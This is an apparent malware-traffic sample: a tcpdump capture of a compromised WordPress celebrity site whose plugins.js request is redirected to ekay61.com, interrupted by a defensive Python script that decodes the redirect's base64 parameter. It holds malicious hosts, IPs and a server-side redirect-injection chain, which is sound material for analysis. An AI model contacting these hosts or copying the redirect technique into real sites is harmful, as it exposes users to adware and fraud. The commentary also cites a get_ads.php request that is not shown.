Unknown Adultfriendfinder Malware Loads Click Fraud Adware PCAP Traffic Sample

By | July 1, 2015

2014-12-31 21:42:01.338041 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [S], seq 2496731022, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…[q….[m…..P………. .D……………
2014-12-31 21:42:01.525412 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [S.], seq 2472158945, ack 2496731023, win 64240, options [mss 1460], length 0
E..,.]……[m…….P…Z&…..`….h……..
2014-12-31 21:42:01.525564 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [.], ack 1, win 64240, length 0
E..(..@…[|….[m…..P…..Z&.P….%……..
2014-12-31 21:42:01.526288 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 1:681, ack 1, win 64240, length 680
E…..@…X…..[m…..P…..Z&.P…….GET / HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.google.com/url?url=http://www.celebrityvalley.com/&rct=j&frm=1&q=&esrc=s&sa=U&ei=4aWkVO_eIdLmoAT9lYG4Bw&ved=0CBYQFjAA&usg=AFQjCNHItcI_Gsw9UnJ1WhX3Uu5awZOTuw
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:01.526349 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [.], ack 681, win 64240, length 0
E..(.^……[m…….P…Z&….7P….}……..
2014-12-31 21:42:01.759148 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [P.], seq 1:1356, ack 681, win 64240, length 1355
E..s._…..e[m…….P…Z&….7P…U…HTTP/1.1 200 OK
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding, Cookie
Cache-Control: max-age=3, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Content-Encoding: gzip

3fa4
2014-12-31 21:42:01.989465 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 681:1072, ack 16671, win 64240, length 391
E…..@…Y…..[m…..P…7.Zh.P…….GET /wp-content/themes/swagger/js/js.css HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:01.989505 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [.], ack 1072, win 64240, length 0
E..(.m……[m…….P…Zh…..P………….
2014-12-31 21:42:02.221782 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [P.], seq 16671:18628, ack 1072, win 64240, length 1957
E….o……[m…….P…Zh…..P…….HTTP/1.1 200 OK
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:01 GMT
Content-Type: text/css
Last-Modified: Tue, 29 Jul 2014 10:29:14 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Content-Encoding: gzip

659
………..Y[o.6.~… 4(…+.q…C….^…….%..E…….x.DITl7….E.;.|..d…..l.M…P(b.2..)…”f.@..hM……..)*..8..x>…z.p..q.T_60y….4….CP1.j6{.w0G.M.h…..g…..J.E..B .h….a.(&.RF.:..$….@.vp.)..Zo..t…..N.Q..W&I.>.7……G..Y..td…H0K.
….-/…Z….g.YY..f….0….k.. .D.._(Vq……….<.l7…F9….)….s..0|.bm.C.B..u..eL…)..&~.6..X….
n .SmC…TL…O..G.-#…8YMr”W&..u..n…B4….(…#h.,..#B.Z>.S!v..W.L….y].T}J…D*.w………..E…\. 2…\7 a[….l}.`….;t=x.J……..qU..%..!…#.V.v….V…….@.K.ec.6..P_…..X.{( k….oI….:.H..R}..H.$8/….h…J(…up…/&4….T$….B’\+…).w….h!.r….J..ts……cU.Yg.zQ…YK.^}Oe.-D=n….22Q..k..^.. p…..G….BY*.0l..bAP…+A….}..$}+………..1….,..>.’.#..’.).[.X’….%..].=…0.{.R..7&..b3.x..B6Y.tN……m….WI.t……s…z..t….s0.,..a.b)=.-…..,…k’.D..(.f…………J….%O%g!b…..QsfzQ’..z….RLE….j.e..x.mJ..viA.9…q…………..Z..S……5.\>G……….Z…..W……&…….&.]..v`pNA..h.?…..Su..5…t……s..a{.k.]U.m….z>D{,………….
i.v..p#g…..i..iH1C.Z…r….f…….c.JY.$J=r<(d…….
.!..9q..v.J9.=.H….uB…2.Z….s. .f_+…dF.Lf&….c..aH…..#5.].\…#..q…….-G7z.Yt..Y..-……B..#..c.u.o!f~%…..R.z…..t7……9jD…..GDF…M…:….v..i…….q…-O…-..BVp….BJ.`a.x..v….iiz……X..~.v………N.,.`.k.Z…;
.3.~…%..\..;..SP….J…H..R>N.wq……..|~…|u.~L.m……….z<.k71F….\..w\.=..?.$b;.4..7….:X..a..=.F$.]e…zu…>6…H..Z..-C..9f…\’3…….)|.O}.TJ=8…………………?.N…………..>…{ …. }.O.W..6;…5…..5…]……P?.hRq.5..?.k.y.
2014-12-31 21:42:02.221970 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [.], ack 18628, win 64240, length 0
E..(..@…[q….[m…..P…..Zo.P….3……..
2014-12-31 21:42:02.460483 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 1072:1482, ack 18628, win 64240, length 410
E…..@…Y…..[m…..P…..Zo.P…p…GET /wp-content/themes/swagger/fonts/BebasNeue-webfont.eot? HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:02.721876 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [P.], seq 18628:19983, ack 1482, win 64240, length 1355
E..s…….5[m…….P…Zo….XP….~..HTTP/1.1 200 OK
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:01 GMT
Content-Type: application/vnd.ms-fontobject
Content-Length: 15438
Last-Modified: Tue, 29 Jul 2014 10:27:10 GMT
Connection: keep-alive
2014-12-31 21:42:02.768058 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 1482:1891, ack 34326, win 64240, length 409
E…..@…Y…..[m…..P…X.Z..P…T…GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:02.768127 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [.], ack 1891, win 64240, length 0
E..(…….q[m…….P…Z……P…b………
2014-12-31 21:42:03.034275 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [P.], seq 34326:35681, ack 1891, win 64240, length 1355
E..s……..[m…….P…Z……P…….HTTP/1.1 200 OK
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:01 GMT
Content-Type: application/javascript
Content-Length: 7200
Last-Modified: Tue, 21 Oct 2014 11:03:09 GMT
Connection: keep-alive
ETag: "54463d6d-1c20"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

/*! jQuery Migrate v1.2.1 | (c) 2005, 2013 jQuery Foundation, Inc. and other contributors | jquery.org/license */
jQuery.migrateMute===void 0&&(jQuery.migrateMute=!0),function(e,t,n){function r(n){var r=t.console;i[n]||(i[n]=!0,e.migrateWarnings.push(n),r&&r.warn&&!e.migrateMute&&(r.warn("JQMIGRATE: "+n),e.migrateTrace&&r.trace&&r.trace()))}function a(t,a,i,o){if(Object.defineProperty)try{return Object.defineProperty(t,a,{configurable:!0,enumerable:!0,get:function(){return r(o),i},set:function(e){r(o),i=e}}),n}catch(s){}e._definePropertyBroken=!0,t[a]=i}var i={};e.migrateWarnings=[],!e.migrateMute&&t.console&&t.console.log&&t.console.log("JQMIGRATE: Logging is active"),e.migrateTrace===n&&(e.migrateTrace=!0),e.migrateReset=function(){i={},e.migrateWarnings.length=0},"BackCompat"===document.compatMode&&r("jQuery is not compatible with Quirks Mode");var o=e("<input/>",{size:1}).attr("size")&&e.attrFn,s=e.attr,u=e.attrHooks.value&&e.attrHooks.value.get||function(){return null},c=e.attrHooks.value&&e.attrHooks.value.
2014-12-31 21:42:03.034395 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [P.], seq 35681:37036, ack 1891, win 64240, length 1355
E..s……..[m…….P…Z.B….P…SK..set||function(){return n},l=/^(?:input|button)$/i,d=/^[238]$/,p=/^(?:autofocus|autoplay|async|checked|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped|selected)$/i,f=/^(?:checked|selected)$/i;a(e,"attrFn",o||{},"jQuery.attrFn is deprecated"),e.attr=function(t,a,i,u){var c=a.toLowerCase(),g=t&&t.nodeType;return u&&(4>s.length&&r("jQuery.fn.attr( props, pass ) is deprecated"),t&&!d.test(g)&&(o?a in o:e.isFunction(e.fn[a])))?e(t)[a](i):("type"===a&&i!==n&&l.test(t.nodeName)&&t.parentNode&&r("Can't change the 'type' of an input or button in IE 6/7/8"),!e.attrHooks[c]&&p.test(c)&&(e.attrHooks[c]={get:function(t,r){var a,i=e.prop(t,r);return i===!0||"boolean"!=typeof i&&(a=t.getAttributeNode(r))&&a.nodeValue!==!1?r.toLowerCase():n},set:function(t,n,r){var a;return n===!1?e.removeAttr(t,r):(a=e.propFix[r]||r,a in t&&(t[a]=!0),t.setAttribute(r,r.toLowerCase())),r}},f.test(c)&&r("jQuery.fn.attr('"+c+"') may use property instead of attribute")),s.call(e,t,a,i))},e.attrHooks.value={get:function(e,t){var n=(e.nodeName||"").toLowerCase();return"button"===n?u.apply(this,arguments):("input"!==n&&"option"!==n&&r("jQuery.fn.attr('value') no longer gets properties"),t in e?e.value:null)},set:function(e,t){var a=(e.nodeName||"").toLowerCase();return"button"===a?c.apply(this,arguments):("input"!==a&&"option"!==a&&r("jQuery.fn.a
2014-12-31 21:42:03.034461 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [.], ack 37036, win 64240, length 0
E..(..@…[G….[m…..P…..Z..P…X………
2014-12-31 21:42:03.831142 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 1891:2297, ack 41852, win 64240, length 406
E…..@…Y…..[m…..P…..Z.]P…N~..GET /wp-content/uploads/2014/12/millions_lg-220×150.jpg HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:03.831212 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [.], ack 2297, win 64240, length 0
E..(……..[m…….P…Z.].. .P…C………
2014-12-31 21:42:04.017648 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [P.], seq 41852:43207, ack 2297, win 64240, length 1355
E..s.(……[m…….P…Z.].. .P….b..HTTP/1.1 200 OK
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:02 GMT
Content-Type: image/jpeg
Last-Modified: Wed, 24 Dec 2014 22:35:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Content-Encoding: gzip

1ea0
ETag: "53d776fe-3c4e"
Accept-Ranges: bytes
2014-12-31 21:42:04.025840 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 2297:2710, ack 50027, win 62840, length 413
E…..@…Yd….[m…..P.. ..Z.LP..x.%..GET /wp-content/uploads/2014/11/22549__img_0253_01-540×390.jpg HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:04.025901 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [.], ack 2710, win 64240, length 0
E..(.>……[m…….P…Z.L..”$P…”&……..
2014-12-31 21:42:04.220004 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [P.], seq 50027:51382, ack 2710, win 64240, length 1355
E..s.v…..N[m…….P…Z.L..”$P…….HTTP/1.1 200 OK
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:03 GMT
Content-Type: image/jpeg
Last-Modified: Fri, 28 Nov 2014 17:41:56 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Content-Encoding: gzip

c00a
…………@{..PNG
2014-12-31 21:42:05.333363 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [.], ack 251547, win 64240, length 0
E..(.{@…Y…..[m…..P..”$.].|P………….
2014-12-31 21:42:05.334998 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 2710:3125, ack 251547, win 64240, length 415
E….~@…W…..[m…..P..”$.].|P…(…GET /wp-content/uploads/2014/12/holmes-elle-122414sp-300×170.jpg HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:05.335049 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [.], ack 3125, win 64240, length 0
E..(……..[m…….P…].|..#.P….T……..
2014-12-31 21:42:05.535758 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [P.], seq 251547:252902, ack 3125, win 64240, length 1355
E..s.L…..w[m…….P…].|..#.P….;..HTTP/1.1 200 OK
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:04 GMT
Content-Type: image/jpeg
Last-Modified: Thu, 25 Dec 2014 02:23:40 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Content-Encoding: gzip

56fa
2014-12-31 21:42:06.868980 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 5623:6018, ack 334563, win 64240, length 395
E…..@…V…..[m…..P..-.._A.P…….GET /wp-content/themes/swagger/js/plugins.js HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:06.869068 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [.], ack 6018, win 64240, length 0
E..(……..[m…….P…_A…/.P………….
2014-12-31 21:42:07.067297 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [FP.], seq 334563:335140, ack 6018, win 64240, length 577
E..i.0……[m…….P…_A…/.P…U…HTTP/1.1 302 Moved Temporarily
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:05 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://pn24tmg6bxdzvpxgypgvxwt.ekay61.com/index.php?b=anM9MSZ1eGJtY3BrZT15amkmdGltZT0xNTAxMDEwMTM3MjMzMjAzNDk1MCZzcmM9Mjc1JnN1cmw9d3d3LmNlbGVicml0eXZhbGxleS5jb20mc3BvcnQ9ODAma2V5PTI3NjVDQ0Q1JnN1cmk9L3dwLWNvbnRlbnQvdGhlbWVzL3N3YWdnZXIvanMvcGx1Z2lucy5qcw==

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
2014-12-31 21:42:07.345597 IP 192.168.138.158.49210 > 67.215.2.195.80: Flags [P.], seq 1:580, ack 1, win 64240, length 579
E..k..@…a…..C….:.Pvv!.+.*.P….1..GET /index.php?b=anM9MSZ1eGJtY3BrZT15amkmdGltZT0xNTAxMDEwMTM3MjMzMjAzNDk1MCZzcmM9Mjc1JnN1cmw9d3d3LmNlbGVicml0eXZhbGxleS5jb20mc3BvcnQ9ODAma2V5PTI3NjVDQ0Q1JnN1cmk9L3dwLWNvbnRlbnQvdGhlbWVzL3N3YWdnZXIvanMvcGx1Z2lucy5qcw== HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: pn24tmg6bxdzvpxgypgvxwt.ekay61.com
2014-12-31 21:42:07.345680 IP 67.215.2.195.80 > 192.168.138.158.49210: Flags [.], ack 580, win 64240, length 0
E..(.Y……C……..P.:+.*.vv#.P…r………
2014-12-31 21:42:08.014697 IP 67.215.2.195.80 > 192.168.138.158.49210: Flags [P.], seq 1:814, ack 580, win 64240, length 813
E..U…… .C……..P.:+.*.vv#.P….0..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:01 +0000
Content-Encoding: gzip
Vary: Accept-Encoding

1fa
…………]o.0…….z1.ACp..)P.@…Y.N.M2.C…LB:……nb..|..=.9.}U…..4……….L!..T…………16.=M…b..l.v\.m. .Fq..~.}…..G…U….Tkt..[…..k..’.’..9.r..|.r.r.R..
K..”…..’.9.7<…&.W.”….P…z..RD.M…>….JA..g…….gB\….._$…z.`}3D`….D……@=..e.|..45.c. S8…r…)%u……G……F.h..X%..%….#…L..^8……..D….&…,. P…..I…x………..p”……K.. .Ws..”CW6f..x6..GG3…..C+4..?..nd..h……Q…j……|..B^!wg’O.3..k..’.,.I.g ……(u0…[..X.”….Z-Q……….X.o-…
0
2014-12-31 21:42:08.116201 IP 67.215.2.195.80 > 192.168.138.158.49210: Flags [P.], seq 1:814, ack 580, win 64240, length 813
E..U……..C……..P.:+.*.vv#.P….0..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:01 +0000
Content-Encoding: gzip
Vary: Accept-Encoding

1fa
2014-12-31 21:42:08.117426 IP 192.168.138.158.49210 > 67.215.2.195.80: Flags [.], ack 814, win 63427, length 0
E..(.8@…c…..C….:.Pvv#.+.-5P…r………
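What the capture shows up to this point: the client loads www.celebrityvalley.com (a WordPress site on 91.109.247.12, "Server: nginx admin") and its theme assets normally, but the request for /wp-content/themes/swagger/js/plugins.js is answered with a 302 whose Location points at pn24tmg6bxdzvpxgypgvxwt.ekay61.com on 67.215.2.195 and carries a base64 blob in the b= parameter, and the client follows it with the same Referer. The script below is an added example, not code from the page's author: it pulls the HTTP requests and responses out of tcpdump -A text, pairs each response with the request on the same TCP connection, and decodes the b= parameter. That value is itself a query string naming the referring host (surl), its port (sport), the path that was requested (suri), a key, and src=275, the same src value that turns up later in the get_ads.php request to 01naxtw68121x3lwjuw6z7p.escortbayanlar.pro. SAMPLE_DUMP is a trimmed copy of the three relevant packets with the unprintable header bytes shortened; all function and variable names are my own.

```python
"""Triage helper for tcpdump -A text: list HTTP transactions and decode the
base64 "b=" parameter carried by the injected 302 seen in this capture."""
import base64
import re
from urllib.parse import unquote, urlsplit

PACKET_RE = re.compile(r"^\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+ IP (\S+) > (\S+): Flags")
REQUEST_RE = re.compile(r"\b(GET|POST|HEAD) (\S+) HTTP/1\.[01]\s*$")
RESPONSE_RE = re.compile(r"\bHTTP/1\.[01] (\d{3})\b")
HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*): (.*)$")

# Constructed excerpt of the capture on this page: the plugins.js request, the
# 302 that answers it and the follow-up request to the redirect target. The
# unprintable IP/TCP header bytes tcpdump prints ahead of the HTTP text are
# abbreviated to dots, as they are in the original output.
SAMPLE_DUMP = """\
2014-12-31 21:42:06.868980 IP 192.168.138.158.49167 > 91.109.247.12.80: Flags [P.], seq 5623:6018, ack 334563, win 64240, length 395
E.....@...V.....[m.....P..-.._A.P.......GET /wp-content/themes/swagger/js/plugins.js HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Host: www.celebrityvalley.com
Connection: Keep-Alive
2014-12-31 21:42:07.067297 IP 91.109.247.12.80 > 192.168.138.158.49167: Flags [FP.], seq 334563:335140, ack 6018, win 64240, length 577
E..i.0......[m.......P..._A.../.P...U...HTTP/1.1 302 Moved Temporarily
Server: nginx admin
Date: Thu, 01 Jan 2015 01:42:05 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://pn24tmg6bxdzvpxgypgvxwt.ekay61.com/index.php?b=anM9MSZ1eGJtY3BrZT15amkmdGltZT0xNTAxMDEwMTM3MjMzMjAzNDk1MCZzcmM9Mjc1JnN1cmw9d3d3LmNlbGVicml0eXZhbGxleS5jb20mc3BvcnQ9ODAma2V5PTI3NjVDQ0Q1JnN1cmk9L3dwLWNvbnRlbnQvdGhlbWVzL3N3YWdnZXIvanMvcGx1Z2lucy5qcw==

<html>
<head><title>302 Found</title></head>
2014-12-31 21:42:07.345597 IP 192.168.138.158.49210 > 67.215.2.195.80: Flags [P.], seq 1:580, ack 1, win 64240, length 579
E..k..@...a.....C....:.Pvv!.+.*.P....1..GET /index.php?b=anM9MSZ1eGJtY3BrZT15amkmdGltZT0xNTAxMDEwMTM3MjMzMjAzNDk1MCZzcmM9Mjc1JnN1cmw9d3d3LmNlbGVicml0eXZhbGxleS5jb20mc3BvcnQ9ODAma2V5PTI3NjVDQ0Q1JnN1cmk9L3dwLWNvbnRlbnQvdGhlbWVzL3N3YWdnZXIvanMvcGx1Z2lucy5qcw== HTTP/1.1
Accept: */*
Referer: http://www.celebrityvalley.com/
Host: pn24tmg6bxdzvpxgypgvxwt.ekay61.com
Connection: Keep-Alive
"""


def parse_dump(text):
    """Return the HTTP transactions found in tcpdump -A text, in request order.

    A response is matched to the newest unanswered request on the same TCP
    connection. Headers are read until a blank line or the next packet line,
    so a header block that tcpdump splits across two segments (as with the
    ETag of the image responses in this capture) is only partly captured."""
    transactions, pending = [], {}
    src = dst = None
    headers = None                                  # header dict being filled
    for line in text.splitlines():
        m = PACKET_RE.match(line)
        if m:
            src, dst = m.groups()
            headers = None
            continue
        m = REQUEST_RE.search(line)
        if m and src:
            tx = {"client": src, "server": dst, "method": m.group(1),
                  "path": m.group(2), "headers": {}, "status": None,
                  "response_headers": {}}
            transactions.append(tx)
            pending[(src, dst)] = tx
            headers = tx["headers"]
            continue
        m = RESPONSE_RE.search(line)
        if m and src:
            tx = pending.pop((dst, src), None)      # responses flow server -> client
            headers = None
            if tx is not None:
                tx["status"] = int(m.group(1))
                headers = tx["response_headers"]
            continue
        if headers is None:
            continue
        if not line.strip():
            headers = None                          # blank line ends the block
            continue
        m = HEADER_RE.match(line)
        if m:
            headers[m.group(1).lower()] = m.group(2)
    return transactions


def decode_redirect_param(url, name="b"):
    """Base64-decode one query parameter of url and split the result as a
    query string. The parameter is cut out by hand rather than with parse_qs
    so that '+' and '=' characters inside the base64 text survive intact."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key != name:
            continue
        value = unquote(value)
        value += "=" * (-len(value) % 4)            # restore any stripped padding
        decoded = base64.b64decode(value).decode("utf-8", "replace")
        return {k: v for k, _, v in (p.partition("=") for p in decoded.split("&"))}
    return None


def redirect_echoes_request(tx):
    """True when the decoded b= parameter of a 302 names the host and path of
    the request that triggered it, i.e. the redirector is told which resource
    on the compromised site the visitor asked for."""
    location = tx["response_headers"].get("location")
    if tx["status"] != 302 or not location:
        return False
    params = decode_redirect_param(location) or {}
    return (params.get("surl") == tx["headers"].get("host")
            and params.get("suri") == tx["path"])


def summarize(transactions):
    """One (host, path, status, location) row per transaction."""
    return [(tx["headers"].get("host", tx["server"]), tx["path"], tx["status"],
             tx["response_headers"].get("location")) for tx in transactions]


if __name__ == "__main__":
    txs = parse_dump(SAMPLE_DUMP)
    for row in summarize(txs):
        print(row)
    print(decode_redirect_param(txs[0]["response_headers"]["location"]))
    print("redirect echoes request:", redirect_echoes_request(txs[0]))
```

To run it over the whole page, paste the dump into a file and call parse_dump() on its contents; the fused line "Connection: keep-alive2014-12-31 ..." and the retransmitted responses (the two identical 200 OK segments from 67.215.2.195) are handled, the first because the packet regex is anchored at line start and the second because a response with no pending request is ignored. The 302 is only triggered for a .js path and carries the victim host, port and path, which is the behaviour to look for when hunting for the server-side redirect that was planted on the WordPress host: a request for a theme script answered by nginx with a 302 to a third-party host rather than with application/javascript.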
2014-12-31 21:42:08.520731 IP 192.168.138.158.52285 > 8.8.8.8.53: 25783+ A? pn24tmg6bxdzvpxgypgvxwt1275597798de83cb36ba750ef5e7e09f9.ekay61.com. (85)
E..q.^……………=.5.]..d………..8pn24tmg6bxdzvpxgypgvxwt1275597798de83cb36ba750ef5e7e09f9.ekay61.com…..
2014-12-31 21:42:08.855057 IP 8.8.8.8.53 > 192.168.138.158.52285: 25783 1/0/0 A 67.215.2.195 (101)
E….)….A……….5.=.m<.d………..8pn24tmg6bxdzvpxgypgvxwt1275597798de83cb36ba750ef5e7e09f9.ekay61.com………….8?..C…
2014-12-31 21:42:08.856664 IP 192.168.138.158.49220 > 67.215.2.195.80: Flags [S], seq 1115835524, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.j@…cy….C….D.PB.L……. .m……………
2014-12-31 21:42:09.067451 IP 67.215.2.195.80 > 192.168.138.158.49220: Flags [S.], seq 4036785705, ack 1115835525, win 64240, options [mss 1460], length 0
E..,.6……C……..P.D..v)B.L.`…T………
2014-12-31 21:42:09.094653 IP 192.168.138.158.49220 > 67.215.2.195.80: Flags [.], ack 1, win 64240, length 0
E..(.q@…c~….C….D.PB.L…v*P…l………
2014-12-31 21:42:09.096294 IP 192.168.138.158.49220 > 67.215.2.195.80: Flags [P.], seq 1:559, ack 1, win 64240, length 558
E..V.r@…aO….C….D.PB.L…v*P….8..GET /get_gift.php HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: pn24tmg6bxdzvpxgypgvxwt1275597798de83cb36ba750ef5e7e09f9.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:09.096432 IP 67.215.2.195.80 > 192.168.138.158.49220: Flags [.], ack 559, win 64240, length 0
E..(.7……C……..P.D..v*B.N.P…jq……..
2014-12-31 21:42:09.428771 IP 67.215.2.195.80 > 192.168.138.158.49220: Flags [P.], seq 1:1200, ack 559, win 64240, length 1199
E….N……C……..P.D..v*B.N.P….K..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 2015 01:42:09 +0000
Content-Encoding: gzip
Vary: Accept-Encoding

37c

